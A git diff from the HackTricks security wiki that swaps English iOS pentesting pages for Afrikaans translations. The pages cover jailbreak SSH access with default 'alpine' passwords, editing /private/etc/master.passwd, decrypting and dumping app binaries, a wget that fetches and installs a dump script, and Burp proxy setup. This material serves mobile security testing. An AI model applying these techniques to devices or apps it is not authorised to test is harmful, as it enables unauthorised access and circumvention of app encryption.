geaktiveer deur die **OpenSSH-pakket** na die gevangenisbreking te installeer, wat verbinding via `ssh root@` moontlik maak. Dit is noodsaaklik om die verstek wagwoorde (`alpine`) vir gebruikers `root` en `mobile` te verander om die toestel te beveilig. -**SSH access** is enabled by installing the **OpenSSH package** post-jailbreak, allowing connections via `ssh root@`. It's crucial to change the default passwords (`alpine`) for users `root` and `mobile` to secure the device. - -**SSH over USB** becomes necessary in the absence of Wi-Fi, using `iproxy` to map device ports for SSH connections. This setup enables SSH access through USB by running: +**SSH oor USB** word nodig as daar geen Wi-Fi beskikbaar is nie, deur `iproxy` te gebruik om toestel poorte vir SSH-verbindinge te karteer. Hierdie opset maak SSH-toegang moontlik deur USB te gebruik deur die volgende uit te voer: ```bash $ iproxy 2222 22 $ ssh -p 2222 root@localhost ``` +**Op-toestel skulprogramme**, soos NewTerm 2, fasiliteer direkte toestelinteraksie, wat veral nuttig is vir foutopsporing. **Omgekeerde SSH-skulprogramme** kan ook opgestel word vir afstandsbediening vanaf die gasrekenaar. -**On-device shell applications**, like NewTerm 2, facilitate direct device interaction, especially useful for troubleshooting. **Reverse SSH shells** can also be established for remote access from the host computer. +### **Herstel van vergeetde wagwoorde** -### **Resetting Forgotten Passwords** +Om 'n vergeetde wagwoord terug te stel na die verstekwaarde (`alpine`), is dit nodig om die `/private/etc/master.passwd`-lêer te wysig. Dit behels die vervanging van die bestaande has met die has vir `alpine` langs die `root`- en `mobile`-gebruikersinskrywings. -To reset a forgotten password back to the default (`alpine`), editing the `/private/etc/master.passwd` file is necessary. This involves replacing the existing hash with the hash for `alpine` next to the `root` and `mobile` user entries. +## **Data-oordragtegnieke** -## **Data Transfer Techniques** - -### **Transferring App Data Files** - -**Archiving and Retrieval via SSH and SCP:** It's straightforward to archive the application's Data directory using `tar` and then transfer it using `scp`. The command below archives the Data directory into a .tgz file, which is then pulled from the device: +### **Oordrag van App Data-lêers** +**Argivering en herwinning via SSH en SCP:** Dit is maklik om die Data-gids van die toepassing te argiveer met behulp van `tar` en dit dan oor te dra met behulp van `scp`. Die onderstaande opdrag argiveer die Data-gids in 'n .tgz-lêer, wat dan van die toestel afgehaal word: ```bash tar czvf /tmp/data.tgz /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693 exit scp -P 2222 root@localhost:/tmp/data.tgz . ``` +### **Grafiese Gebruikerskoppelvlak-hulpmiddels** -### **Graphical User Interface Tools** +**Gebruik van iFunbox en iExplorer:** Hierdie GUI-hulpmiddels is nuttig vir die bestuur van lêers op iOS-toestelle. Tog het Apple vanaf iOS 8.4 hierdie hulpmiddels se toegang tot die toepassingsandbox beperk, tensy die toestel gejailbreak is. -**Using iFunbox and iExplorer:** These GUI tools are useful for managing files on iOS devices. However, starting with iOS 8.4, Apple restricted these tools' access to the application sandbox unless the device is jailbroken. - -### **Using Objection for File Management** - -**Interactive Shell with Objection:** Launching objection provides access to the Bundle directory of an app. From here, you can navigate to the app's Documents directory and manage files, including downloading and uploading them to and from the iOS device. +### **Gebruik van Objection vir Lêerbestuur** +**Interaktiewe Skulp met Objection:** Deur objection te begin, verkry jy toegang tot die Bundel-gids van 'n toepassing. Van hier af kan jy na die toepassing se Dokumente-gids navigeer en lêers bestuur, insluitend aflaai en oplaai na en van die iOS-toestel. ```bash objection --gadget com.apple.mobilesafari explorer cd /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents file download ``` +## **Verkryging en Uitpak van Programme** -## **Obtaining and Extracting Apps** - -### **Acquiring the IPA File** - -**Over-The-Air (OTA) Distribution Link:** Apps distributed for testing via OTA can be downloaded using the ITMS services asset downloader tool, which is installed via npm and used to save the IPA file locally. +### **Verkryging van die IPA-lêer** +**Over-The-Air (OTA) Verspreidingskoppeling:** Programme wat vir toetsing via OTA versprei word, kan afgelaai word deur die ITMS-diens bate-aflaaier-hulpmiddel te gebruik. Hierdie hulpmiddel word geïnstalleer via npm en word gebruik om die IPA-lêer lokaal te stoor. ```bash npm install -g itms-services itms-services -u "itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist" -o - > out.ipa ``` +### **Uittreksel van die App Binêre** -### **Extracting the App Binary** +1. **Van 'n IPA:** Ontpak die IPA om toegang te verkry tot die gedekripteerde app binêre. +2. **Van 'n Jailbroken-toestel:** Installeer die app en onttrek die gedekripteerde binêre vanaf die geheue. -1. **From an IPA:** Unzip the IPA to access the decrypted app binary. -2. **From a Jailbroken Device:** Install the app and extract the decrypted binary from memory. +### **Dekripsieproses** -### **Decryption Process** - -**Manual Decryption Overview:** iOS app binaries are encrypted by Apple using FairPlay. To reverse-engineer, one must dump the decrypted binary from memory. The decryption process involves checking for the PIE flag, adjusting memory flags, identifying the encrypted section, and then dumping and replacing this section with its decrypted form. - -**Checking and Modifying PIE Flag:** +**Oorsig van Handmatige Dekripsie:** iOS-app-binêres word deur Apple versleutel met behulp van FairPlay. Om dit te herontwerp, moet die gedekripteerde binêre uit die geheue uitgelek word. Die dekripsieproses behels die kontroleer van die PIE-vlag, die aanpassing van geheuevlaggies, die identifisering van die versleutelde gedeelte, en dan die uitlek en vervanging van hierdie gedeelte met sy gedekripteerde vorm. +**Kontroleer en Wysig PIE-vlag:** ```bash otool -Vh Original_App python change_macho_flags.py --no-pie Original_App otool -Vh Hello_World ``` +**Identifiseer Versleutelde Seksie en Dump Geheue:** -**Identifying Encrypted Section and Dumping Memory:** - -Determine the encrypted section's start and end addresses using `otool` and dump the memory from the jailbroken device using gdb. - +Bepaal die begin- en eindadresse van die versleutelde sekisie deur `otool` te gebruik en dump die geheue van die jailbroken toestel met behulp van gdb. ```bash otool -l Original_App | grep -A 4 LC_ENCRYPTION_INFO dump memory dump.bin 0x8000 0x10a4000 ``` +**Oorskryf die Versleutelde Seksie:** -**Overwriting the Encrypted Section:** - -Replace the encrypted section in the original app binary with the decrypted dump. - +Vervang die versleutelde seksie in die oorspronklike app binêre lêer met die gedekripteerde dump. ```bash dd bs=1 seek= conv=notrunc if=dump.bin of=Original_App ``` +**Finale Dekripsie:** Wysig die metadata van die binêre lêer om aan te dui dat daar geen enkripsie is nie deur gebruik te maak van hulpmiddels soos **MachOView**, deur die `cryptid` in te stel op 0. -**Finalizing Decryption:** Modify the binary's metadata to indicate the absence of encryption using tools like **MachOView**, setting the `cryptid` to 0. - -### **Decryption (Automatically)** +### **Dekripsie (Outomaties)** #### **frida-ios-dump** -The [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) tool is employed for **automatically decrypting and extracting apps** from iOS devices. Initially, one must configure `dump.py` to connect to the iOS device, which can be done through localhost on port 2222 via **iproxy** or directly via the device's IP address and port. +Die [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) hulpmiddel word gebruik om **toepassings outomaties te dekripteer en te onttrek** vanaf iOS-toestelle. Aanvanklik moet `dump.py` gekonfigureer word om met die iOS-toestel te verbind, wat gedoen kan word deur middel van localhost op poort 2222 via **iproxy** of direk deur die IP-adres en poort van die toestel. -Applications installed on the device can be listed with the command: +Toepassings wat op die toestel geïnstalleer is, kan gelys word met die opdrag: ```bash $ python dump.py -l ``` - -To dump a specific app, such as Telegram, the following command is used: +Om 'n spesifieke app, soos Telegram, te dump, word die volgende bevel gebruik: ```bash $ python3 dump.py -u "root" -p "" ph.telegra.Telegraph ``` -This command initiates the app dump, resulting in the creation of a `Telegram.ipa` file in the current directory. This process is suitable for jailbroken devices, as unsigned or fake-signed apps can be reinstalled using tools like [**ios-deploy**](https://github.com/ios-control/ios-deploy). +Hierdie bevel begin die app-dump, wat lei tot die skepping van 'n `Telegram.ipa` lêer in die huidige gids. Hierdie proses is geskik vir jailbroken toestelle, aangesien ongetekende of vals-ondertekende programme herïnstalleer kan word met behulp van hulpmiddels soos [**ios-deploy**](https://github.com/ios-control/ios-deploy). #### **flexdecrypt** -The [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) tool, along with its wrapper [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac), allows for the extraction of IPA files from installed applications. Installation commands for **flexdecrypt** on the device include downloading and installing the `.deb` package. **flexdump** can be used to list and dump apps, as shown in the commands below: - +Die [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) hulpmiddel, saam met sy omhulsel [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac), maak dit moontlik om IPA-lêers uit geïnstalleerde programme te onttrek. Installasie-opdragte vir **flexdecrypt** op die toestel sluit die aflaai en installeer van die `.deb`-pakket in. **flexdump** kan gebruik word om programme te lys en te dump, soos getoon in die volgende opdragte: ```bash apt install zip unzip wget https://gist.githubusercontent.com/defparam/71d67ee738341559c35c684d659d40ac/raw/30c7612262f1faf7871ba8e32fbe29c0f3ef9e27/flexdump -P /usr/local/bin; chmod +x /usr/local/bin/flexdump flexdump list flexdump dump Twitter.app ``` - #### **bagbak** -[**bagbak**](https://github.com/ChiChou/bagbak), another Frida-based tool, requires a jailbroken device for app decryption: - +[**bagbak**](https://github.com/ChiChou/bagbak), nog 'n Frida-gebaseerde instrument, vereis 'n jailbroken toestel vir app dekripsie: ```bash bagbak --raw Chrome ``` - #### **r2flutch** -**r2flutch**, utilizing both radare and frida, serves for app decryption and dumping. More information can be found on its [**GitHub page**](https://github.com/as0ler/r2flutch). +**r2flutch**, wat beide radare en frida gebruik, dien vir app dekripsie en dump. Meer inligting kan gevind word op sy [**GitHub-bladsy**](https://github.com/as0ler/r2flutch). -### **Installing Apps** +### **Installeer Apps** -**Sideloading** refers to installing applications outside the official App Store. This process is handled by the **installd daemon** and requires apps to be signed with an Apple-issued certificate. Jailbroken devices can bypass this through **AppSync**, enabling the installation of fake-signed IPA packages. +**Sideloading** verwys na die installeer van programme buite die amptelike App Store. Hierdie proses word hanteer deur die **installd daemon** en vereis dat programme onderteken moet word met 'n Apple-uitgereikte sertifikaat. Gehackte toestelle kan hierdie proses omseil deur middel van **AppSync**, wat die installasie van vals-ondertekende IPA-pakette moontlik maak. -#### **Sideloading Tools** +#### **Sideloading-hulpmiddels** -- **Cydia Impactor**: A tool for signing and installing IPA files on iOS and APK files on Android. Guides and troubleshooting can be found on [yalujailbreak.net](https://yalujailbreak.net/how-to-use-cydia-impactor/). +- **Cydia Impactor**: 'n Hulpmiddel vir die onderteken en installeer van IPA-lêers op iOS en APK-lêers op Android. Gidse en probleemoplossing kan gevind word op [yalujailbreak.net](https://yalujailbreak.net/how-to-use-cydia-impactor/). -- **libimobiledevice**: A library for Linux and macOS to communicate with iOS devices. Installation commands and usage examples for ideviceinstaller are provided for installing apps over USB. +- **libimobiledevice**: 'n Biblioteek vir Linux en macOS om met iOS-toestelle te kommunikeer. Installasie-opdragte en gebruiksvoorbeelde vir ideviceinstaller word verskaf vir die installeer van programme via USB. -- **ipainstaller**: This command-line tool allows direct app installation on iOS devices. +- **ipainstaller**: Hierdie opdraglynhulpmiddel maak direkte app-installasie op iOS-toestelle moontlik. -- **ios-deploy**: For macOS users, ios-deploy installs iOS apps from the command line. Unzipping the IPA and using the `-m` flag for direct app launch are part of the process. +- **ios-deploy**: Vir macOS-gebruikers installeer ios-deploy iOS-apps vanaf die opdraglyn. Die IPA-lêer word uitgepakte en die `-m` vlag word gebruik vir direkte app-lancering as deel van die proses. -- **Xcode**: Utilize Xcode to install apps by navigating to **Window/Devices and Simulators** and adding the app to **Installed Apps**. +- **Xcode**: Gebruik Xcode om programme te installeer deur na **Window/Devices and Simulators** te navigeer en die app by **Installed Apps** te voeg. -#### **Allow Application Installation on Non-iPad Devices** -To install iPad-specific applications on iPhone or iPod touch devices, the **UIDeviceFamily** value in the **Info.plist** file needs to be changed to **1**. This modification, however, requires re-signing the IPA file due to signature validation checks. +#### **Toelaat van Toepassingsinstallasie op Nie-iPad-toestelle** +Om iPad-spesifieke programme op iPhone- of iPod touch-toestelle te installeer, moet die **UIDeviceFamily**-waarde in die **Info.plist**-lêer verander word na **1**. Hierdie wysiging vereis egter dat die IPA-lêer heronderteken word as gevolg van handtekeningvalideringskontroles. -**Note**: This method might fail if the application demands capabilities exclusive to newer iPad models while using an older iPhone or iPod touch. +**Let op**: Hierdie metode kan misluk as die toepassing funksies vereis wat eksklusief is vir nuwer iPad-modelle terwyl 'n ouer iPhone of iPod touch gebruik word. -## References +## Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](ttps://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/) * [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0052/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0052/) * [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0053/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0053/) @@ -206,14 +180,14 @@ To install iPad-specific applications on iPhone or iPod touch devices, the **UID
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md index ae93c59fb..d3c103817 100644 --- a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md +++ b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md @@ -1,123 +1,120 @@ -# iOS Burp Suite Configuration +# iOS Burp Suite Konfigurasie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Installing the Burp Certificate on iOS Devices +## Installeer die Burp-sertifikaat op iOS-toestelle -For secure web traffic analysis and SSL pinning on iOS devices, the Burp Suite can be utilized either through the **Burp Mobile Assistant** or via manual configuration. Below is a summarized guide on both methods: +Vir veilige webverkeersanalise en SSL-pinning op iOS-toestelle kan die Burp Suite gebruik word deur die **Burp Mobile Assistant** of deur middel van handmatige konfigurasie. Hieronder is 'n opsomming van beide metodes: -### Automated Installation with Burp Mobile Assistant -The **Burp Mobile Assistant** simplifies the installation process of the Burp Certificate, proxy configuration, and SSL Pinning. Detailed guidance can be found on [PortSwigger's official documentation](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing). +### Outomatiese installasie met Burp Mobile Assistant +Die **Burp Mobile Assistant** vereenvoudig die installasieproses van die Burp-sertifikaat, proksi-konfigurasie en SSL-pinning. Gedetailleerde leiding is beskikbaar op [PortSwigger se amptelike dokumentasie](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing). -### Manual Installation Steps -1. **Proxy Configuration:** Start by setting Burp as the proxy under the iPhone's Wi-Fi settings. -2. **Certificate Download:** Navigate to `http://burp` on your device's browser to download the certificate. -3. **Certificate Installation:** Install the downloaded profile via **Settings** > **General** > **VPN & Device Management**, then enable trust for the PortSwigger CA under **Certificate Trust Settings**. +### Handmatige installasie-stappe +1. **Proksi-konfigurasie:** Begin deur Burp as die proksi in te stel onder die iPhone se Wi-Fi-instellings. +2. **Sertifikaat aflaai:** Navigeer na `http://burp` op jou toestel se blaaier om die sertifikaat af te laai. +3. **Sertifikaat-installasie:** Installeer die afgelaaide profiel via **Instellings** > **Algemeen** > **VPN & toestelbestuur**, en skakel dan vertroue in vir die PortSwigger CA onder **Sertifikaatvertrouensinstellings**. -### Configuring an Interception Proxy -The setup enables traffic analysis between the iOS device and the internet through Burp, requiring a Wi-Fi network that supports client-to-client traffic. If unavailable, a USB connection via usbmuxd can serve as an alternative. PortSwigger's tutorials provide in-depth instructions on [device configuration](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) and [certificate installation](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device). +### Konfigurering van 'n onderskeppingproksi +Die opset maak verkeersanalise tussen die iOS-toestel en die internet moontlik deur middel van Burp, wat 'n Wi-Fi-netwerk vereis wat kliënt-tot-kliënt-verkeer ondersteun. As dit nie beskikbaar is nie, kan 'n USB-verbinding via usbmuxd as 'n alternatief dien. PortSwigger se tutoriale bied in-diepte instruksies oor [toestelkonfigurasie](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) en [sertifikaat-installasie](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device). -### Advanced Configuration for Jailbroken Devices -For users with jailbroken devices, SSH over USB (via **iproxy**) offers a method to route traffic directly through Burp: +### Gevorderde konfigurasie vir gejailbreakte toestelle +Vir gebruikers met gejailbreakte toestelle bied SSH oor USB (via **iproxy**) 'n metode om verkeer direk deur Burp te roeteer: -1. **Establish SSH Connection:** Use iproxy to forward SSH to localhost, allowing connection from the iOS device to the computer running Burp. - ```bash - iproxy 2222 22 - ``` -2. **Remote Port Forwarding:** Forward the iOS device's port 8080 to the computer's localhost to enable direct access to Burp's interface. - ```bash - ssh -R 8080:localhost:8080 root@localhost -p 2222 - ``` -3. **Global Proxy Setting:** Lastly, configure the iOS device's Wi-Fi settings to use a manual proxy, directing all web traffic through Burp. +1. **Stel SSH-verbinding op:** Gebruik iproxy om SSH na localhost te stuur, sodat die iOS-toestel 'n verbinding met die rekenaar wat Burp hardloop, kan maak. +```bash +iproxy 2222 22 +``` +2. **Verre Port Forwarding:** Stuur die iOS-toestel se poort 8080 na die rekenaar se localhost om direkte toegang tot Burp se koppelvlak moontlik te maak. +```bash +ssh -R 8080:localhost:8080 root@localhost -p 2222 +``` +3. **Globale Proksi-instelling:** Laastens, stel die Wi-Fi-instellings van die iOS-toestel in om 'n handmatige proksi te gebruik, wat alle webverkeer deur Burp rig. +### Volledige Netwerkmonitoring/Sniffing -### Full Network Monitoring/Sniffing +Die monitering van nie-HTTP-toestelverkeer kan effektief uitgevoer word met behulp van **Wireshark**, 'n instrument wat in staat is om alle vorme van data-verkeer vas te lê. Vir iOS-toestelle word die monitering van verkeer in werklike tyd fasiliteer deur die skep van 'n Remote Virtual Interface, 'n proses wat in [hierdie Stack Overflow-pos](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819) beskryf word. Voor die begin van die proses is die installasie van **Wireshark** op 'n macOS-stelsel 'n vereiste. -Monitoring of non-HTTP device traffic can be efficiently conducted using **Wireshark**, a tool capable of capturing all forms of data traffic. For iOS devices, real-time traffic monitoring is facilitated through the creation of a Remote Virtual Interface, a process detailed in [this Stack Overflow post](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819). Prior to beginning, installation of **Wireshark** on a macOS system is a prerequisite. - -The procedure involves several key steps: - -1. Initiate a connection between the iOS device and the macOS host via USB. -2. Ascertain the iOS device's **UDID**, a necessary step for traffic monitoring. This can be done by executing a command in the macOS Terminal: +Die prosedure behels verskeie sleutelstappe: +1. Begin 'n verbinding tussen die iOS-toestel en die macOS-gashere via USB. +2. Bepaal die iOS-toestel se **UDID**, 'n noodsaaklike stap vir verkeersmonitering. Dit kan gedoen word deur 'n opdrag in die macOS-Terminal uit te voer: ```bash $ rvictl -s Starting device [SUCCEEDED] with interface rvi0 ``` +3. Na identifikasie van die UDID, moet **Wireshark** geopen word en die "rvi0"-koppelvlak vir data-opname gekies word. +4. Vir doelgerigte monitering, soos die opname van HTTP-verkeer wat verband hou met 'n spesifieke IP-adres, kan Wireshark se Opnamefilters gebruik word: -3. Post-identification of the UDID, **Wireshark** is to be opened, and the "rvi0" interface selected for data capture. -4. For targeted monitoring, such as capturing HTTP traffic related to a specific IP address, Wireshark's Capture Filters can be employed: +## Burp-sertifikaatinstallasie in die Simulator -## Burp Cert Installation in Simulator +* **Voer Burp-sertifikaat uit** -* **Export Burp Certificate** - -In _Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER format_ +In _Proxy_ --> _Opsies_ --> _Voer CA-sertifikaat uit_ --> _Sertifikaat in DER-formaat_ ![](<../../.gitbook/assets/image (459).png>) -* **Drag and Drop** the certificate inside the Emulator -* **Inside the emulator** go to _Settings_ --> _General_ --> _Profile_ --> _PortSwigger CA_, and **verify the certificate** -* **Inside the emulator** go to _Settings_ --> _General_ --> _About_ --> _Certificate Trust Settings_, and **enable PortSwigger CA** +* **Sleep en laat val** die sertifikaat binne die Emulator +* **Binne die emulator** gaan na _Instellings_ --> _Algemeen_ --> _Profiel_ --> _PortSwigger CA_, en **verifieer die sertifikaat** +* **Binne die emulator** gaan na _Instellings_ --> _Algemeen_ --> _Oor_ --> _Sertifikaatvertrouensinstellings_, en **aktiveer PortSwigger CA** ![](<../../.gitbook/assets/image (460).png>) -**Congrats, you have successfully configured the Burp CA Certificate in the iOS simulator** +**Geluk, jy het die Burp CA-sertifikaat suksesvol gekonfigureer in die iOS-simulator** {% hint style="info" %} -**The iOS simulator will use the proxy configurations of the MacOS.** +**Die iOS-simulator sal die proksi-konfigurasies van MacOS gebruik.** {% endhint %} -### MacOS Proxy Configuration +### MacOS Proksi-konfigurasie -Steps to configure Burp as proxy: +Stappe om Burp as proksi te konfigureer: -* Go to _System Preferences_ --> _Network_ --> _Advanced_ -* In _Proxies_ tab mark _Web Proxy (HTTP)_ and _Secure Web Proxy (HTTPS)_ -* In both options configure _127.0.0.1:8080_ +* Gaan na _Sisteemvoorkeure_ --> _Netwerk_ --> _Gevorderd_ +* Op die _Proksi_ -tabblad merk _Webproksi (HTTP)_ en _Veilige webproksi (HTTPS)_ +* Konfigureer in beide opsies _127.0.0.1:8080_ ![](<../../.gitbook/assets/image (461).png>) -* Click on _**Ok**_ and the in _**Apply**_ +* Klik op _**Ok**_ en dan op _**Toepas**_
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md b/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md index ff735fb68..63c94c79b 100644 --- a/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md +++ b/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md @@ -1,32 +1,31 @@ -# Extracting Entitlements from Compiled Application +# Uittreksel van Toekennings uit Saamgestelde Toepassing
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 